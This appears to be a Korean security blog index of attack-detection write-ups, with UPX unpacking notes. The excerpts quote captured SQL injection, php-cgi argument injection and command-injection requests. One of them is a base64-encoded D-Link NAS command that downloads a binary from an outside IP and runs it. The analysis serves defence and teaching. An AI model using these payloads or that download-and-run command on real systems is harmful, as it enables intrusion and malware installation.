jarvis-concert 님의 블로그

공격설명 이 취약점은 악의적인 사용자가 보안상의 취약점을 이용하여, 임의의 SQL 문을 주입하고 실행되게 하여 데이터베이스가 비정상적인 동작을 하도록 조작하는 행위입니다. 해당 구문이 정상 동작할 경우, 공격자는 결과 확인을 통해 취약점 존재 여부를 판단할 수 있으며, 데이터베이스에 침입하여 시스템의 민감한 정보를 변경하거나 탈취할 수 있습니다. 공격구문 GET /news/js.php?f_id=1) UnIoN SeLeCt 1,Md5(1234),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#&type=ho..

공격설명 이 취약점은 악의적인 사용자가 보안상의 취약점을 이용하여, 임의의 SQL 문을 주입하고 실행되게 하여 데이터베이스가 비정상적인 동작을 하도록 조작하는 행위입니다. 해당 구문이 정상 동작할 경우, 공격자는 결과 확인을 통해 취약점 존재 여부를 판단할 수 있으며, 데이터베이스에 침입하여 시스템의 민감한 정보를 변경하거나 탈취할 수 있습니다. 공격구문 GET /zhidao/zhidao/search.php?&tags=ll ll ll&keyword=111&fulltext[]=11) AnD 1=2 UnIoN SeLeCt 1 FrOm (SeLeCt CoUnT(*),CoNcAt(FlOoR(RaNd(0)*2),Md5(1234))a FrOm InFoRmAtIoN_ScHeMa.TaBlEs GrOuP By a)b# ..

공격설명응용 프로그램에 코드를 악의적으로 삽입하려는 공격 시도가 탐지되었습니다.Code Injection 공격으로 삽입된 코드는 데이터베이스 무결성을 손상시키거나 개인 정보 보호 속성, 보안 및 데이터 정확성까지 손상시킬 수 있습니다.또한 데이터 손실, 액세스 거부 등을 초래할 수 있으며 호스트 탈취로 이어질 수 있는 공격으로, 시스템 해킹 또는 정보 획득, 권한 상승 또는 시스템에 대한 무단 액세스를 위한 크래킹에서 널리 사용됩니다.해당 구문이 동작할 경우, 공격자는 서버 측에서 임의의 함수를 실행하여 대상 서버의 민감한 정보를 탈취하거나 시스템을 제어할 수 있습니다. 공격구문POST /php-cgi/php-cgi.exe?�d+cgi.force_redirect=0+�d+disable_functions=..

공격설명HTTP 요청 데이터를 검사하여 웹 어플리케이션의 취약점 공격 시도가 탐지되었습니다.웹 어플리케이션에서 쿼리가 전송되는 곳에 시스템 명령어를 허용하여 삽입되는 공격 기법으로 취약한 어플리케이션의 경우 서버의 시스템 명령어가 웹상에서 실행될 수 있습니다.공격자는 취약한 어플리케이션을 공격 대상으로 하여 임의의 명령어를 시스템상에 입력하여 결과값을 얻을 수 있습니다.공격 성공할 경우 서버에 연계된 악의적인 공격을 시도할 가능성이 있습니다. 공격구문POST /adminlnso/login.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept-Encoding: ..

공격설명요청 헤더의 필수 항목을 검사하여 비정상적인 HTTP 트래픽이 탐지되었습니다.웹 브라우저에서 정상적으로 보내는 HTTP 요청문과 달리 요청 Header 필수요소가 누락되었거나 잘못되었을 경우 이를 탐지합니다.이러한 트래픽은 대부분 취약점 스캔 및 크롤링(정보 수집)을 위한 자동화 도구나 봇 등에서 발생하기에 비정상 트래픽으로 간주할 수 있습니다. 공격구문POST /proc/selectPackageList.do HTTP/1.1Content-Length: 719Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464...

UPX 섹션의 raw-size가 0 bytes이고, entry-point가 첫 번째 섹션이 아닌 UPX1로 설정, 섹션 네임에 UPX0, UPX1가 존재하는 것을 미루어 해당 파일은 코드 packing된 실행파일로 의심할 수 있다.실행파일 언패킹 시 raw-size가 0 bytes에서 8192 bytes로 증가했으며, entry-point가 첫 번째 색션으로 설정, 섹션 네임에 파일명이 존재하게 되었고, items -> file에 숨겨진 파일 정보가 생성 되었다.패킹 전에는 Import API 목록이 11개로 확인되었으나, 언패킹 이후에는 Import API 목록가 86개로 증가하였다.

UPX는 여러 운영체제에서 수많은 파일 포맷을 지원하는 오픈 소스 실행 파일 압축 프로그램으로 압축,        압축 해제의 기능을 모두 담당한다. 명령어 : 파일들이 위치한 경로> upx.exe –d –o “저장할 파일명”.exe “Unpack할 파일명“.exe명령어 : 파일들이 위치한 경로> upx.exe –d “Unpack할 파일명“.exe –o “저장할 파일명”.exe-d : UPX로 압축된 파일을 압축 해제-o : 압축 해제 후 생성될 파일명 설정UPX를 이용해 언패킹 시 기존 파일에 비해 파일 크기가 증가한 것을 확인 할 수 있다.

- S/W가 패킹되면 소스코드를 쉽게 볼 수 없게 된다. 이런 패킹 된 소스코드를 보기 위해 암호화를 풀거나 압축을 풀어 코드를 풀어내는 과정을 언패킹이라고 한다.- 패커란 패킹을 해주는 프로그램을 말하며, 악성코드에 이용되는 패커는 주로 UPX이다- 실행파일 내부 로직, 헤더, 외부호출함수, 데이터 등을 숨기거나, 백신 탐지를 우회하기 위해    내부 데이터를 압축한다.  ＊용량 축소 목적이 아니다.

패킹은 S/W를 암호화하거나 압축하여 소스코드를 볼 수 없게 만드는 것이다S/W를 패킹할 때 주목적은 Pretection(보호) 와 Compressor(압축) 이다- 실행파일을 압축하게 되면 용량이 줄어들어 다운로드시 걸리는 시간이 줄어들게 되며,  압축된 파일은 시스템의 공간을 적게 차지하기 때문에 파일 시스템으로부터 데이터가  메모리에 전송되는 시간이 덜 걸리므로 더 빨리 실행하게 된다. 이러한 장점들로 인해 악성코드에 패킹이 많이 사용된다. 악성코드를  패킹하게되면, 다른 컴퓨터에 바이러스를 빨리 유포시킬 수 있고, 리버싱을 하기까지 시간이 더 오래걸리는 이점이 있다. (패킹된 실행 파일을 리버싱을 하기위해 언패킹을 해야되기 때문이다.)

공격설명명령어 주입 취약점을 악용한 공격 시도가 탐지되었습니다. 명령어 주입 취약점은 웹 어플리케이션에서 발생하는 보안 취약성 중 하나로, 명령 프롬프트나 셸 명령어를 실행하는 부분에서 발생할 수 있습니다. 공격자는 Command Injection 공격을 통해 웹 서버의 민감한 정보 획득할 수 있고 그에 따라 DB 탈취 및 사용자 인증 우회 등의 연계된 공격을 수행할 수 있습니다. 공격구문GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=Y2QgL3RtcDtybSAtcmYgZGxpbms7d2dldCAxNTYuMjM4LjIyNC4yMTQvZGxpbms7Y2htb2QgNzc3IGRsaW5rO3NoIGRsaW5r HTTP/1.1 Host: ..